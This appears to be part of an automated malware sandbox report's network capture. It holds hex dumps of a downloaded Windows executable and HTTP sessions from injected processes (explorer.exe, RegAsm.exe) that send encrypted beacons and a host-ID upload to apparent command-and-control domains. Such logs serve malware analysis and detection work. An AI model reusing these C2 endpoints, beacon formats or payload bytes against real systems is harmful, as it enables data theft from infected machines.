00 00 6b 00 00 00 4a 00 00 00 38 2a 00 00 00 73 15 00 00 0a 80 02 00 00 04 38 00 00 00 00 73 16 00 00 0a 80 03 00 00 04 20 01 00 00 00 16 39 c2 ff ff ff 26 38 b8 ff ff ff 73 17 00 00 0a 80 05 00 00 04 20 02 00 00 00 17 3a a7 ff ff ff 26 38 9d ff ff ff 2a 73 18 00 00 0a 80 04 00 00 04 20 00 00 00 00 17 3a 8b ff ff ff 26 20 00 00 00 00 38 80 ff ff ff 73 19 00 00 0a 80 06 00 00 04 20 03 00 00 00 38 6c ff ff ff 13 30 03 00 5a 00 00 00 02 00 00 11 2b 05 28 da 57 30 5c 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 27 00 00 00 05 00 00 00 38 22 00 00 00 00 7e 02 00 00 04 6f 1a 00 00 0a 13 01 20 00 00 00 00 28 0c 00 00 06 39 d2 ff ff ff 26 38 c8 ff ff ff 38 05 00 00 00 38 00 00 00 00 11 01 2a 00 00 13 30 03 00 4d 00 00 00 03 00 00 11 2b 05 28 93 46 6b 4b 38
                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP11 2@ 3p4@1K23 3k1 H.text$1 1 `.rsrc21@@.reloc33@B1HhDh :+(5E(*V+(,?(8*B+(J:~*6+(f6a~*0+(*Me8E/KkJ8*s8s 9&8s :&8*s :& 8s 8l0Z+(W0\ 8E'8"~o (9&888*0M+(FkK8
                                                                                                        Oct 3, 2023 18:02:37.535650015 CEST328INData Raw: 2f 00 00 00 fe 0c 01 00 45 01 00 00 00 1f 00 00 00 38 1a 00 00 00 38 15 00 00 00 20 00 00 00 00 28 0b 00 00 06 3a de ff ff ff 26 38 d4 ff ff ff 11 00 2a 00 7e 03 00 00 04 6f 1b 00 00 0a 13 00 38 d1 ff ff ff 00 00 00 13 30 03 00 5a 00 00 00 04 00
                                                                                                        Data Ascii: /E88 (:&8*~o80Z+(</7 8E*8%~o (9&8*880Z+(\ 8E*8%~o
                                                                                                        Oct 3, 2023 18:02:37.535677910 CEST329INData Raw: 2a 00 13 30 03 00 48 00 00 00 13 00 00 11 2b 05 28 24 2b 3c 42 38 2f 00 00 00 fe 0c 00 00 45 01 00 00 00 1f 00 00 00 38 1a 00 00 00 38 15 00 00 00 20 00 00 00 00 28 3c 00 00 06 3a de ff ff ff 26 38 d4 ff ff ff 11 01 2a 00 7e 11 00 00 04 13 01 38
                                                                                                        Data Ascii: *0H+($+<B8/E88 (<:&8*~8J+(,WPI(:*B+(4'/S~*6+(K{7~*0U+(>6 8E%8 (? (@:&8*88:
                                                                                                        Oct 3, 2023 18:02:37.535734892 CEST331INData Raw: 00 8c 09 00 00 33 1b 03 00 43 37 03 00 83 fa 00 00 47 27 01 00 ea 20 01 00 a5 bf 02 00 90 37 01 00 7e 0f 02 00 4d a9 00 00 03 eb 01 00 23 12 00 00 dc 4a 00 00 56 ec 01 00 0b da 01 00 55 b1 01 00 78 34 03 00 eb 2a 02 00 66 36 03 00 00 5c 01 00 f9
                                                                                                        Data Ascii: 3C7G' 7~M#JVUx4*f6\dF3%8=aD{BUy=@?:PEi|@7 u\+9e|WMe
                                                                                                        Oct 3, 2023 18:02:37.535823107 CEST332INData Raw: 6a 01 00 a4 5d 02 00 00 1f 03 00 bf 2b 02 00 0d 09 01 00 e8 12 03 00 56 20 03 00 64 f0 00 00 76 0a 02 00 aa 3a 01 00 82 d6 01 00 f7 08 03 00 22 75 01 00 9b 52 02 00 81 cb 00 00 74 25 03 00 8a f5 00 00 e8 39 00 00 a5 06 02 00 53 df 01 00 9e af 02
                                                                                                        Data Ascii: j]+V dv:"uRt%9SefgCqC:|/ Iw9?mgoLYou/1w,6qJu}#p~,
                                                                                                        Oct 3, 2023 18:02:37.535852909 CEST333INData Raw: 00 53 97 02 00 06 1d 03 00 79 64 02 00 b6 0f 01 00 2c e5 01 00 c2 86 00 00 a3 02 01 00 3a 14 00 00 2e 06 02 00 23 62 00 00 79 97 01 00 44 48 03 00 e6 d1 02 00 4f c2 01 00 25 ab 02 00 b3 6e 00 00 cc 9d 00 00 6f 30 02 00 3a 7b 00 00 67 94 02 00 4b
                                                                                                        Data Ascii: Syd,:.#byDHO%no0:{gK[E=n1T8:ui}_U!F-K0Bot'kwRwjbQnmkGdf
                                                                                                        Oct 3, 2023 18:02:37.535904884 CEST335INData Raw: 65 02 00 20 90 02 00 50 08 02 00 24 37 02 00 43 29 03 00 2e d9 01 00 02 bc 00 00 92 ad 02 00 d5 f8 02 00 6f ad 01 00 db 46 02 00 cc bf 02 00 43 7f 00 00 da 1b 01 00 f6 0f 03 00 cb f3 01 00 29 8a 02 00 1b 69 01 00 7f db 00 00 07 86 00 00 ad 1e 03
                                                                                                        Data Ascii: e P$7C).oFC)i'"X0L/5Gnt;owy_g*MP12}uD{A,am4q_)x
                                                                                                        Oct 3, 2023 18:02:37.535984039 CEST336INData Raw: 00 c1 1f 03 00 c2 2d 03 00 1a 3d 03 00 82 ae 02 00 28 1d 01 00 a0 f0 00 00 21 eb 01 00 21 9c 02 00 11 4a 00 00 0c a0 01 00 0e 55 00 00 9b 7f 01 00 0b 2a 02 00 ef af 02 00 23 b8 01 00 00 71 01 00 a8 24 02 00 88 8e 00 00 dc 36 03 00 ab 52 00 00 16
                                                                                                        Data Ascii: -=(!!JU*#q$6R\KN2wU)Axj9|grAG=0-"-{=&huTjV$iho^?
                                                                                                        Oct 3, 2023 18:02:37.536048889 CEST337INData Raw: 92 00 00 d8 d1 00 00 c9 5d 01 00 ae aa 00 00 a4 51 02 00 bc fd 00 00 ef 58 00 00 60 fb 01 00 7e f1 00 00 1a 10 03 00 f8 08 02 00 ab 76 00 00 2a 0f 02 00 24 33 03 00 08 80 01 00 1c 4a 03 00 84 2f 03 00 ba 3e 00 00 39 70 01 00 f0 40 00 00 78 f2 02
                                                                                                        Data Ascii: ]QX`~v*$3J/>9p@x;l!/>+pUJt+@tMW5ETW@kHlfHKJ5A
                                                                                                        Oct 3, 2023 18:02:37.536139965 CEST339INData Raw: 00 18 28 03 00 71 ed 00 00 a2 1c 00 00 de 3b 00 00 e0 b4 00 00 ac fa 01 00 54 a6 00 00 3a 4f 00 00 8e 20 02 00 8f 07 03 00 b3 05 02 00 42 da 02 00 92 2a 02 00 11 02 02 00 a0 7c 01 00 f5 b5 02 00 8f 9b 01 00 21 67 02 00 b8 70 00 00 2e 13 01 00 0c
                                                                                                        Data Ascii: (q;T:O B*|!gp.iXvSO*;>`}LA`z/'hs K7-v9i.90>m"?@v6s[
                                                                                                        Oct 3, 2023 18:02:37.757522106 CEST340INData Raw: 67 01 00 a2 d8 01 00 1b d7 00 00 08 58 02 00 11 06 01 00 e2 0f 02 00 62 31 00 00 98 5b 01 00 b8 b4 01 00 32 24 03 00 02 a4 00 00 46 79 00 00 4d c9 02 00 18 fe 01 00 1d 15 02 00 c4 64 01 00 ee 1e 02 00 c8 95 02 00 03 19 03 00 f0 db 01 00 d7 1d 02
                                                                                                        Data Ascii: gXb1[2$FyMdIxI{9I{{Q(TrK`.147&K2)fMvEN9h3o [AgH


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        13192.168.2.349829175.126.109.1580C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:40.507474899 CEST3879OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://hnpeauvsal.net/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 200
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:40.507474899 CEST3880OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 03 6b 2c 90 f4 76 0b 75 58 30 e9 82
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA ,[k,vuX0oX^;(z5'GY=[[:6;# 1C;M?h"^7&7
                                                                                                        Oct 3, 2023 18:02:41.646045923 CEST3881INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:41 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        14192.168.2.349830172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:41.476600885 CEST3880OUTPOST /api HTTP/1.1
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Content-Length: 54
                                                                                                        Cache-Control: no-cache
                                                                                                        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 72 49 77 68 6f 55 2d 2d 45 6c 76 69 6e 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30
                                                                                                        Data Ascii: act=recive_message&lid=rIwhoU--Elvin&j=default&ver=4.0
                                                                                                        Oct 3, 2023 18:02:41.825648069 CEST3883INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:41 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=7crqj1trlca4n8ogl5st602kmq; expires=Sat, 27 Jan 2024 09:49:20 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:41 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n%2FK%2BYNYb31JJWzL7ce2GadevgGG81e0ZisyEKhTQ90U%2BE8sPjPlssYGt5OH0oMDE1%2B4kMpgzcB8mxTbkWCVTd795TcPfUtZZkrRDVcjS2AeVWTmbTnFYlQFh0T9ljoA7bVvvcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669317f102d16-IAD
                                                                                                        Data Raw: 34 30 37 30 0d 0a 75 58 70 74 58 65 65 79 48 39 69 49 45 54 77 50 4b 70 73 2f 78 77 72 6e 6b 58 48 31 7a 4e 72 64 4b 6a 49 79 6c 45 51 77 72 6a 58 43 64 32 64 39 78 35 49 2f 2b 76 34 7a 42 69 38 65 74 7a 4c 4e 4b 73 65 78 55 64 65 2f 76 2f 38 51 45 6b 62 6d 4d 56 57 43 4f 4c 4e 61 54 58 33 48 6b 48 36 38 71 69 73 63 61 55 76 33 54 4b 49 6d 36 70 74 52 31 65 7a 36 2f 30 39 4b 45 4b 35 6b 61 36 4d 2f 6d 56 70 4e 66 63 65 53 5a 4e 57 43 4d 52 77 76 43 72 73 66 35 79 72 46 39 42 2f 58 39 76 72
                                                                                                        Data Ascii: 4070uXptXeeyH9iIETwPKps/xwrnkXH1zNrdKjIylEQwrjXCd2d9x5I/+v4zBi8etzLNKsexUde/v/8QEkbmMVWCOLNaTX3HkH68qiscaUv3TKIm6ptR1ez6/09KEK5ka6M/mVpNfceSZNWCMRwvCrsf5yrF9B/X9vr
                                                                                                        Oct 3, 2023 18:02:41.825696945 CEST3884INData Raw: 2f 54 31 68 51 39 53 68 53 7a 31 37 57 43 67 45 2b 6a 39 35 34 73 4f 31 79 57 47 35 47 39 6c 71 69 62 34 62 37 48 35 79 68 73 72 41 49 48 6a 2b 65 5a 42 43 4f 46 5a 6c 61 54 58 33 46 31 32 58 36 73 6a 45 65 51 6b 2f 76 58 6f 70 72 6c 50 70 54 2b
                                                                                                        Data Ascii: /T1hQ9ShSz17WCgE+j954sO1yWG5G9lqib4b7H5yhsrAIHj+eZBCOFZlaTX3F12X6sjEeQk/vXoprlPpT+Mb6/QoSErQ5HKM/mVpNfceSZNWCMRwvCrsf5yrF9B/X9vr/RFlQ/SxWzFDWHQw4ht16sOR0WmFB9Fulb4H2AZKntLMIHj+eZBCOFZlaTX3F12X6sjEeQk/vXoprlPpT+Mb6/QoSErQ5HKM/mVpNfceSZNWCMRwvCr
                                                                                                        Oct 3, 2023 18:02:41.825710058 CEST3886INData Raw: 69 46 65 6a 41 2b 5a 57 41 55 74 67 4e 35 35 73 4f 39 33 55 6d 64 49 2f 45 2b 74 62 6f 4c 2f 47 35 4b 68 76 72 70 46 56 31 76 31 4e 45 44 50 55 39 55 55 54 33 48 71 75 44 2f 34 71 44 45 63 4c 77 71 37 48 61 4a 77 78 61 74 52 31 34 75 76 76 46 68
                                                                                                        Data Ascii: iFejA+ZWAUtgN55sO93UmdI/E+tboL/G5KhvrpFV1v1NEDPU9UUT3HquD/4qDEcLwq7HaJwxatR14uvvFhWU7ZJOo4VmVpNfZqeEtKoMRwvCrtEygDHsVHV7Pr9ChBX+mYKjhfbFgM0gtt2vu5zU2ZG91SpYIn0AZqrsLVBVVz7JUDPVptWYFfHkj/4qDEcLwj+ReUwx7M0pJmb/yc4ErRkEI4VxFZgV8eSP/ioMUcCILsf5yrH
                                                                                                        Oct 3, 2023 18:02:41.825720072 CEST3887INData Raw: 54 48 67 41 32 6c 39 4e 78 74 4f 31 39 55 6d 4e 46 38 31 36 6f 4b 4d 75 63 65 39 58 73 2b 76 30 4b 45 68 4b 30 5a 6c 58 55 46 34 4e 61 54 78 4f 43 33 56 4f 78 35 6e 51 65 41 69 43 37 48 2b 63 71 78 37 45 4d 32 63 48 51 2f 51 6f 53 45 72 52 6b 53
                                                                                                        Data Ascii: THgA2l9NxtO19UmNF816oKMuce9Xs+v0KEhK0ZlXUF4NaTxOC3VOx5nQeAiC7H+cqx7EM2cHQ/QoSErRkS6M/mVpNfceSP/iqdFItELsdqWKJ+hOeq7C0QVVR/SNRylrUER01ht5+tuZ1X25a8VTlJuqbUdXs+v0KEhK2IUqMD5lYLjGIxHqqqhw2Lwq7H+cqmr18/8X6/VE/OLRkEI4VmVpNf4LcPeKoM11sR/pcqG6M+xORq7
                                                                                                        Oct 3, 2023 18:02:41.825779915 CEST3888INData Raw: 75 56 2b 74 4f 52 30 53 43 30 6e 6b 52 2f 6e 4b 73 65 78 55 59 6a 67 30 39 41 67 4f 78 4b 30 50 7a 32 6b 46 5a 6c 61 54 58 33 48 6b 6a 2f 36 37 58 38 65 4e 51 71 35 55 4b 6c 69 69 50 59 58 6e 36 6d 37 76 6b 52 55 58 66 73 69 57 38 68 53 79 51 6f
                                                                                                        Data Ascii: uV+tOR0SC0nkR/nKsexUYjg09AgOxK0Pz2kFZlaTX3Hkj/67X8eNQq5UKliiPYXn6m7vkRUXfsiW8hSyQoJMYXfc7XmYVBoSPUd6wftsVHV7Pr9ChIQ8T4SlBWbKRg/xb8V+KgxHC8K5hPOB+2ce/zs+qYnOBK0ZBCOFZlaTziJkCX4qnxTf0T2XaRrgfgUkai5vE1TVfAnUsBd3BAFMYjWebzsMxACILsf5yrHsVHV7r+nCAgS
                                                                                                        Oct 3, 2023 18:02:41.825861931 CEST3890INData Raw: 78 48 43 38 4b 75 30 4c 72 42 2b 32 78 55 64 58 73 2b 76 31 52 50 7a 69 30 5a 42 43 4f 46 5a 6c 61 54 58 2b 43 33 44 33 69 71 44 4e 57 59 45 44 7a 57 61 4a 6c 67 76 55 61 68 61 65 39 73 55 68 55 57 2f 6b 67 56 73 39 58 79 52 34 4c 4e 34 62 64 63
                                                                                                        Data Ascii: xHC8Ku0LrB+2xUdXs+v1RPzi0ZBCOFZlaTX+C3D3iqDNWYEDzWaJlgvUahae9sUhUW/kgVs9XyR4LN4bdcLTpdx4jJ5Ef5yrHsVHV7Pi4UBAItGZgwVnAFwguj5AS0qgxHC8Ku0LrB+2xUdXs+v1RPzi0ZBCOFZlaTX+C3D3iqDNaY1ryXK5ji/QckqS4sExTXv0nUcRa1hYFNozXcb7tMxACILsf5yrHsVHV7r+nCAgStg1z4X
                                                                                                        Oct 3, 2023 18:02:41.825912952 CEST3891INData Raw: 78 2f 6e 4b 73 66 71 66 50 2f 73 2b 76 30 4b 45 68 4b 30 5a 42 4c 4c 57 35 74 41 54 58 2b 46 30 58 43 6f 37 33 4a 55 5a 30 58 78 55 71 42 74 69 76 63 58 6e 4b 43 71 73 55 64 51 56 76 30 6e 56 38 39 63 30 52 59 47 4c 63 57 65 45 74 4b 6f 4d 52 77
                                                                                                        Data Ascii: x/nKsfqfP/s+v0KEhK0ZBLLW5tATX+F0XCo73JUZ0XxUqBtivcXnKCqsUdQVv0nV89c0RYGLcWeEtKoMRwvCrsf5yiC61PP7PiVU1Fd+mR8x0HcWi4xjtdxrKocNi8Kux/nKpq9fP/s+v0KEhLvSTqOFZlaTX3Hkj295jMGLwjwU6lrgvsbkq6zv0daXvE0WMBdyRcMMoHdd7/jYVtkTrkTygDHsVHV7Pr9ChBX7mYKjhfjEwEN
                                                                                                        Oct 3, 2023 18:02:41.825968981 CEST3892INData Raw: 78 55 64 57 33 31 39 63 4b 45 68 4b 30 5a 42 43 4f 46 5a 73 66 41 33 2f 64 6b 6a 32 78 35 48 5a 66 59 55 4c 2b 55 37 64 70 6a 2f 38 53 6b 4b 6d 7a 72 55 4e 43 57 2f 34 6c 58 4d 52 65 32 78 59 50 50 6f 6a 51 50 66 53 46 47 78 77 76 43 72 73 66 35
                                                                                                        Data Ascii: xUdW319cKEhK0ZBCOFZsfA3/dkj2x5HZfYUL+U7dpj/8SkKmzrUNCW/4lXMRe2xYPPojQPfSFGxwvCrsf5yrHsxSP7uD9CHVz4TBYjnTMDgU4icZ2u+llU30IljXnKsexUdWx9tAgEhK0ZBCOTrRwTX3Hkj/4qDEeakS5BecojvwdmqW8tk1YU/MjWMBb2hAGNYDVe7DpfVFsRP1Uq2HFvXz/7Pr9ChIStGQSy0+bQE1/s8B6ou
                                                                                                        Oct 3, 2023 18:02:41.825997114 CEST3894INData Raw: 50 30 59 48 6a 2b 65 5a 42 43 4f 46 5a 6c 61 54 58 33 46 31 47 7a 36 73 6a 45 4f 50 78 4f 73 44 76 49 34 31 35 78 37 31 65 7a 36 2f 51 6f 53 54 37 68 4a 4f 6f 34 56 6d 56 70 4e 66 5a 79 2f 46 66 69 6f 4d 52 77 76 43 72 73 66 35 58 37 46 71 31 48
                                                                                                        Data Ascii: P0YHj+eZBCOFZlaTX3F1Gz6sjEOPxOsDvI415x71ez6/QoST7hJOo4VmVpNfZy/FfioMRwvCrsf5X7Fq1HF4NfXChIStGQQjhWbCk9nx5A6ufhhWG5e+hqbVqv0FZKpqP1mW0TxZhyjP5laTX3Hkj/4qnweNQrAHe0our18/+z6/QoSErRkEtQXg1pPCobec738YhNDT/9YonjH3RiDqfjxJzgStGQQjhWZWk85xYg/6qQcNi8K
                                                                                                        Oct 3, 2023 18:02:41.826091051 CEST3895INData Raw: 6b 53 54 71 4f 46 5a 6c 61 54 58 32 61 6e 68 4c 53 71 44 45 63 4c 77 71 37 52 4d 6f 41 78 37 46 52 31 65 7a 36 2f 51 6f 51 52 72 5a 2b 45 4a 34 5a 74 48 42 4e 66 63 65 53 50 2f 69 6f 4d 52 35 2f 43 4b 45 66 35 53 2b 47 34 51 47 52 72 61 36 38 44
                                                                                                        Data Ascii: kSTqOFZlaTX2anhLSqDEcLwq7RMoAx7FR1ez6/QoQRrZ+EJ4ZtHBNfceSP/ioMR5/CKEf5S+G4QGRra68D25u1i1ez1vaH09x6rg/+KgxHC8Kux2qKN2xU5S8qvBZRl3mIR7ERtYUQX3J1Ha273ROIlrpVql+yfcB2eyptEdCXvFpQ9payxsKOMnYbLfmMxACILsf5yrHsVHV7qD/EBIQwyVcwlDNCUIfjtx+tut0HiMnkR/nKs
                                                                                                        Oct 3, 2023 18:02:41.826176882 CEST3897INData Raw: 35 56 33 5a 33 33 48 6b 6a 2f 34 71 44 45 63 4c 55 65 35 42 65 64 52 36 70 74 52 31 65 7a 36 2f 51 6f 53 45 72 52 6b 45 49 34 58 79 78 38 4f 4f 49 6e 47 62 4c 33 36 5a 31 6c 39 57 62 56 48 71 6d 62 46 76 58 7a 2f 37 50 72 39 43 68 49 53 74 47 51
                                                                                                        Data Ascii: 5V3Z33Hkj/4qDEcLUe5BedR6ptR1ez6/QoSErRkEI4Xyx8OOInGbL36Z1l9WbVHqmbFvXz/7Pr9ChIStGQQjhWZWB40k9dyueZwW2pYtUeqZsWce9Xs+v0KEhK0GRyjP5laTX3Hkj/4qmseNQq5frd6i/gSlLizskRBHdItXMtv0BYBPMWeEtKoMRwvCrsf5yiDs0vV/vbQIBIStGQQjhWZWAsuxYg/6rgoCz4fqQ/KAMexUdXs


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        15192.168.2.349831211.104.254.13980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:42.047935009 CEST3901OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://rutca.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 341
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:42.047935009 CEST3902OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 4e 27 e4 fd
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vuN'u3b~il1bD 1|1T+=KQ%A!\?B[b5IXyIIaCCH^mScR2>{#qk,)*kW<
                                                                                                        Oct 3, 2023 18:02:43.370208025 CEST3905INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:42 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 59
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 52 39 08 a5 6c 53 b5 a9 1f a6 d0 b3 f9 7b db 21 d3 fc 30 51 1c 89 9d 8a dc 61 c3 2d 5a 06 8f 06 8b 4d 63 1d 51 a5 9e
                                                                                                        Data Ascii: #\(R9lS{!0Qa-ZMcQ


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        16192.168.2.349832172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:42.062052965 CEST3902OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:42.062472105 CEST3903OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:43.169843912 CEST3904INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:43 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=o8fr62ntnipgrs3s8ick5f9vhf; expires=Sat, 27 Jan 2024 09:49:21 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:42 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ad0LNQI6dZULt6YPqNY%2BosnvG58fy%2FyQ6Eopj1hRaST9SltXwK0UEXXSJDo0tByVW9JWfWbCwCduHH9OdULlFjYH2MtxwA94VfrhYxdMA0P3Is62HLPCd0baGKhwruiTEcMoGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669351e432d09-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:43.169871092 CEST3904INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        17192.168.2.349834172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:43.471599102 CEST3905OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
